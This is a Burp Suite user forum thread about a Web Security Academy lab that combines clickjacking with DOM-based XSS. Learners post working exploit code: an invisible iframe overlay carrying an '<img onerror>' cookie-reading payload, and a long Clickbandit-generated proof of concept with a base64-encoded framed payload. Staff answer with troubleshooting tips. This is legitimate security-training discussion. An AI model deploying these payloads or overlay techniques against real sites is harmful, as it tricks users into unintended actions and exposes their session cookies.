Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Exploiting clickjacking vulnerability to trigger DOM-based XSS

Kazuo | Last updated: Apr 22, 2021 10:12AM UTC

I successfully run the script with the code below, but it doesn't show "Solved". why? <style> iframe { position:relative; width:1000px; height: 1000px; opacity: 0.0001; z-index: 2; } div { position:absolute; top:830px; left:80px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://ac931fb81fe08f968005198400750024.web-security-academy.net/feedback?name=<img src=1 onerror=alert(document.cookie)>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>

Hannah, PortSwigger Agent | Last updated: Apr 22, 2021 03:22PM UTC

Hi

Did you try following along with a video solution like this one?

If you adjust the opacity of the iframe so you can see the page that is behind, do the "Submit feedback" button and the "Click me" decoy action line up?

nobug | Last updated: Feb 11, 2023 01:57AM UTC

I also cannot get this lab "solved". What I have tried: * the lab Solution * the Community solutions <https://www.youtube.com/watch?v=hqXAgFQXOH0> * the sugguested video <https://www.youtube.com/watch?v=Zm1lQAQOqJ0> in the pevious answer by Hannah * burp tool - Clickbandit all of these methods got chrome print() invoked when testing exploit by myself. I have successfully passed 3 Clickjacking labs before this lab by using Clickbandit or according to the those lab Solutions. So I guess there may be something wrong with the victim verfication part of the code of this lab, it doesn't work well now.

Hannah, PortSwigger Agent | Last updated: Feb 15, 2023 10:28AM UTC

Hi Are you still having issues solving this lab? We've just tested the given solution and it works as expected.

Kim | Last updated: Dec 18, 2023 09:48AM UTC

having issues with this lab - clickbandit doesn't seem to make the lab pass - although it works in the browser if the button isn't pressed too quickly <div id="container" style="clip-path: inset(200px 360px 234px 200px); clip: rect(200px, 360px, 234px, 200px); overflow: hidden; position: absolute; left: 0px; top: 0px; width: 100%; height: 100%;"> <!-- Clickjacking PoC Generated by Burp Suite Professional --> <input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;"> <div id="clickjack_button" style="opacity: 1; transform-style: preserve-3d; text-align: center; font-family: Arial; font-size: 100%; width: 160px; height: 34px; z-index: 0; background-color: red; color: rgb(255, 255, 255); position: absolute; left: 200px; top: 200px;"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click</div></div> <!-- Show this element when clickjacking is complete --> <div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You've been clickjacked!</div></div> <iframe id="parentFrame" src="data:text/html;base64,PHNjcmlwdD53aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigibWVzc2FnZSIsIGZ1bmN0aW9uKGUpeyB2YXIgZGF0YSwgY2hpbGRGcmFtZSA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjaGlsZEZyYW1lIik7IHRyeSB7IGRhdGEgPSBKU09OLnBhcnNlKGUuZGF0YSk7IH0gY2F0Y2goZSl7IGRhdGEgPSB7fTsgfSBpZighZGF0YS5jbGlja2JhbmRpdCl7IHJldHVybiBmYWxzZTsgfSBjaGlsZEZyYW1lLnN0eWxlLndpZHRoID0gZGF0YS5kb2NXaWR0aCsicHgiO2NoaWxkRnJhbWUuc3R5bGUuaGVpZ2h0ID0gZGF0YS5kb2NIZWlnaHQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLmxlZnQgPSBkYXRhLmxlZnQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLnRvcCA9IGRhdGEudG9wKyJweCI7fSwgZmFsc2UpOzwvc2NyaXB0PjxpZnJhbWUgc3JjPSJodHRwczovLzBhMjkwMGY1MDRiMWUwNWY4NjA3ZjIzMjAwNjUwMGJmLndlYi1zZWN1cml0eS1hY2FkZW15Lm5ldC9mZWVkYmFjaz9uYW1lPSYjMzc7M0NpbWcmIzM3OzIwc3JjPTAmIzM3OzIwb25lcnJvcj1wcmludCYjNDA7JiM0MTsmIzM3OzNFJiMzODtlbWFpbD1rbSYjNjQ7YmZkcy5jb20mIzM4O3N1YmplY3Q9YmxhaCYjMzg7bWVzc2FnZT13aGF0IiBzY3JvbGxpbmc9Im5vIiBzdHlsZT0id2lkdGg6MjQ1NnB4O2hlaWdodDo5MzZweDtwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0Oi00NThweDt0b3A6LTYzNXB4O2JvcmRlcjowOyIgZnJhbWVib3JkZXI9IjAiIGlkPSJjaGlsZEZyYW1lIiBvbmxvYWQ9InBhcmVudC5wb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeSh7Y2xpY2tiYW5kaXQ6MX0pLCcqJykiPjwvaWZyYW1lPg==" frameborder="0" scrolling="no" style="transform: scale(1); transform-origin: 200px 200px 0px; opacity: 0.0001; border: 0px; position: absolute; z-index: 1; width: 2456px; height: 936px; left: 0px; top: 0px;"></iframe> </div> <script>function findPos(obj) { var left = 0, top = 0; if(obj.offsetParent) { while(1) { left += obj.offsetLeft; top += obj.offsetTop; if(!obj.offsetParent) { break; } obj = obj.offsetParent; } } else if(obj.x && obj.y) { left += obj.x; top += obj.y; } return [left,top]; }function generateClickArea(pos) { var elementWidth, elementHeight, x, y, parentFrame = document.getElementById('parentFrame'), desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight, docWidth, docHeight, btn = document.getElementById('clickjack_button'); if(pos < window.clickbandit.config.clickTracking.length) { clickjackCompleted(false); elementWidth = window.clickbandit.config.clickTracking[pos].width; elementHeight = window.clickbandit.config.clickTracking[pos].height; btn.style.width = elementWidth + 'px'; btn.style.height = elementHeight + 'px'; window.clickbandit.elementWidth = elementWidth; window.clickbandit.elementHeight = elementHeight; x = window.clickbandit.config.clickTracking[pos].left; y = window.clickbandit.config.clickTracking[pos].top; docWidth = window.clickbandit.config.clickTracking[pos].documentWidth; docHeight = window.clickbandit.config.clickTracking[pos].documentHeight; parentOffsetWidth = desiredX - x; parentOffsetHeight = desiredY - y; parentFrame.style.width = docWidth+'px'; parentFrame.style.height = docHeight+'px'; parentFrame.contentWindow.postMessage(JSON.stringify({clickbandit: 1, docWidth: docWidth, docHeight: docHeight, left: parentOffsetWidth, top: parentOffsetHeight}),'*'); calculateButtonSize(getFactor(parentFrame)); showButton(); if(parentFrame.style.opacity === '0') { calculateClip(); } } else { resetClip(); hideButton(); clickjackCompleted(true); } }function hideButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 0; }function showButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 1; }function clickjackCompleted(show) { var complete = document.getElementById('clickjack_complete'); if(show) { complete.style.display = 'block'; } else { complete.style.display = 'none'; } }window.addEventListener("message", function handleMessages(e){ var data; try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit) { return false; } showButton(); },false);window.addEventListener("blur", function(){ if(window.clickbandit.mouseover) { hideButton();setTimeout(function(){ generateClickArea(++window.clickbandit.config.currentPosition);document.getElementById("clickjack_focus").focus();},1000); } }, false);document.getElementById("parentFrame").addEventListener("mouseover",function(){ window.clickbandit.mouseover = true; }, false);document.getElementById("parentFrame").addEventListener("mouseout",function(){ window.clickbandit.mouseover = false; }, false);</script><script>window.clickbandit={mode: "review", mouseover:false,elementWidth:160,elementHeight:34,config:{"clickTracking":[{"width":160,"height":34,"mouseX":725,"mouseY":860,"left":658,"top":835,"documentWidth":2456,"documentHeight":936}],"currentPosition":0}};function calculateClip() { var btn = document.getElementById('clickjack_button'), w = btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y = btn.offsetTop; container.style.overflow = 'hidden'; container.style.clip = 'rect('+y+'px, '+(x+w)+'px, '+(y+h)+'px, '+x+'px)'; container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)+'px '+x+'px)'; }function calculateButtonSize(factor) { var btn = document.getElementById('clickjack_button'), resizedWidth = Math.round(window.clickbandit.elementWidth * factor), resizedHeight = Math.round(window.clickbandit.elementHeight * factor); btn.style.width = resizedWidth + 'px'; btn.style.height = resizedHeight + 'px'; if(factor > 100) { btn.style.fontSize = '400%'; } else { btn.style.fontSize = (factor * 100) + '%'; } }function resetClip() { var container = document.getElementById('container'); container.style.overflow = 'visible'; container.style.clip = 'auto'; container.style.clipPath = 'none'; }function getFactor(obj) { if(typeof obj.style.transform === 'string') { return obj.style.transform.replace(/[^\d.]/g,''); } if(typeof obj.style.msTransform === 'string') { return obj.style.msTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.MozTransform === 'string') { return obj.style.MozTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.oTransform === 'string') { return obj.style.oTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.webkitTransform === 'string') { return obj.style.webkitTransform.replace(/[^\d.]/g,''); } return 1; }</script>

Kim | Last updated: Dec 18, 2023 10:32AM UTC

for the above - changed the text on the button to Click me but still doesn't work

Hannah, PortSwigger Agent | Last updated: Dec 18, 2023 05:51PM UTC

Hi Are you using the exploit server to deliver the exploit to the victim? It looks like you are using a different technique to the one that we recommend using in the lab. If you use the lab solution, does the lab solve for you?

Mathieu | Last updated: Apr 06, 2024 12:03PM UTC

Hi, Same issue on my side. I've also tried the official and community solutions, hosted on the exploit server associated to this lab. It is working for me when I click on "View Exploit" but it does not work when I "deliver exploit to victim". Thank you !

Hannah, PortSwigger Agent | Last updated: Apr 08, 2024 03:24PM UTC

Hi I've just tested this lab, and have solved it using the provided solution. Have you made sure to change the "Test me" text to "Click me" in order to deliver the exploit to the user?

Mathieu | Last updated: Apr 09, 2024 01:33AM UTC

Oh I am so sorry, you're right, that was my mistake. Mea culpa.

Hannah, PortSwigger Agent | Last updated: Apr 09, 2024 12:11PM UTC

Glad to hear that's working for you! If there's anything else we can help with, then please let us know.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.